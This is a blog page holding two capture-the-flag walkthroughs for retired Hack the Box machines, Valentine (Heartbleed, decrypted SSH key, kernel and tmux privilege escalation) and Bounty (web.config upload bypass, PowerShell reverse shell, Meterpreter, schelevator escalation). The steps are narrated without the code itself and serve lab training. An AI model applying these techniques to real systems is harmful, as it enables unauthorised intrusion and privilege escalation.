AdSense

Friday, March 22, 2019

Valentine


VALENTINE

 - Layout for this exercise:



1 - INTRODUCTION

 -  The goal of this exercise is to develop a hacking process for the vulnerable machine Valentine, what is a retired machine from the Hack the Box pentesting platform:

 https://www.hackthebox.eu
2 - ENUMERATION

- Valentine's IP is 10.10.10.79:


- Scanning with Nmap:





- Connecting with the browser at port 80 the image is very reminiscent of the Heartbleed vulnerability icon:



- Same thing with HTTPS at port 443:



- There is a lot of information available about Heartbleed vulnerability:

 http://heartbleed.com/

 https://en.wikipedia.org/wiki/Heartbleed


- Nmap script confirms the Heartbleed vulnerability:




- Dirbusting Valentine's web server:



- Checking folder /encode:




- Checking folder /decode:


- Going to /dev:


- Reading notes.txt:



- Reading hype_key:



- Copying hype_key locally:




- Because hype_key is written with hexadecimal numbers let's decode it:


- It seems that we are dealing with an RSA Private key. Copying it locally:



3 - EXPLOITATION

- Looking for an exploit related to Heartbleed vulnerability:





- Copying the Python script 32764.py to the working folder:




- Now, launching the script against Valentine's IP:



..................................

- The answer includes a reference to a string encoded with Base64:






- Decoding the string we get a plaint text string: heartbleedbelievethehype



- Going back to the encrypted key, let's see whether openssl help to decrypt it by providing as password the string heartbleedbelievethehype:


- The new decrypted ssh_key:



- SSH-ing valentine with user hype's credentials:

- The remote shell is low privileged:




4 - CAPTURING THE 1st FLAG

 - Reading user.txt:


5 - PRIVILEGE ESCALATION

- Let's try two ways for Privilege Escalation:
5.1 - Kernel exploitation

- First, checking Operating System version and Kernel number:




- There are some exploits for Linux 3.2 kernel version, for instance this one:




- Downloading to Kali and transferring to Valentine:



- Compiling according to the instructions:




- Now, a new password must be entered, for instance hello:





- Switching to the user firefart with the new password hello we get a root shell:

5.2 - Tmux

- Reading the hidden file .bash_history there is a reference to a tmux command:






- Also, ps aux confirms that there is a tmux session running as root:


- Finally, just running the tmux command found at .bash_history we get a remote root shell:






6 - CAPTURING THE 2nd FLAG

- Reading root.txt:









Posted by at
Labels:

Thursday, March 21, 2019

Bounty


BOUNTY

 - Layout for this exercise:



1 - INTRODUCTION

 -  The goal of this exercise is to develop a hacking process for the vulnerable machine Bounty what is a retired machine from the Hack the Box pentesting platform:

 https://www.hackthebox.eu


 2 - ENUMERATION

- Bounty's IP is 10.10.10.93:
- Scanning with Nmap, Bounty seems to be a Windows system with a web server running IIS/7.5 at port 80:




- Connecting to the web server:



- Dirbuster (using file extension aspx or asp because the server runs IIS) discovers file transfer.aspx and folder /uploadedFiles:




- Checking transfer.aspx it is an uploader:


- Folder /uploadedFiles seems to be forbidden at this moment:




3 - EXPLOITATION

web.config files play an important role in storing IIS/7 (and higher) settings, very similar to a .htaccess file in Apache web server.

 - web.config files can be used to bypass protections around the file uploaders by including ASP code, instead of directly uploadind ASP exploits that in our case are blacklisted.

 - For further information:

 https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/

- Let's try this web.config file to illustrate this technique, where the ASP code just adds 1 + 2:



- Uploading successfully web.config:


- Running web.config with the browser, as expected the result is the number 3 displayed at the screen:


- So it seems that an interesting technique to exploit the vulnerable machine will be to upload some kind of exploit (using the web.config template) with transfer.aspx and run it remotely through the browser.

 - For instance let's copy locally this Powershell reverse shell exploit, adapting to our needs in terms of IP and port:

 https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3#file-powershell_reverse_shell-ps1
- Inserting the reference to powershell_reverse_shell.ps1 into a new web.config:



- Setting a simple HTTP server at port 80:


- Setting a Netcat listening session at port 7777: 


- Uploading web.config:


- Running web.config remotely:



- The consequence is a low privileged remote shell:







4 - CAPTURING THE 1st FLAG

- Reading user.txt (using option -Force to discover hidden files):

5 - PRIVILEGE ESCALATION

- However to achieve a remote root shell we need something more powerful than the previous shell. 

 - Creating a Meterpreter reverse shell exploit.exe with msfvenom:






- Transferring the exploit from Kali to Bounty:


- Setting a Meterpreter listening session:



- Running exploit.exe:



- The consequence is a Meterpreter session:






- Using the post exploitation module to find a privilege escalation exploit, for instance ms10_092_schelevator:


- Backgrounding the session and running the exploit we get a remote shell as privileged user NT AUTHORITY\SYSTEM:






6 - CAPTURING THE 2nd FLAG

 - Reading root.txt:











Posted by at
Labels:
Subscribe to: Posts (Atom)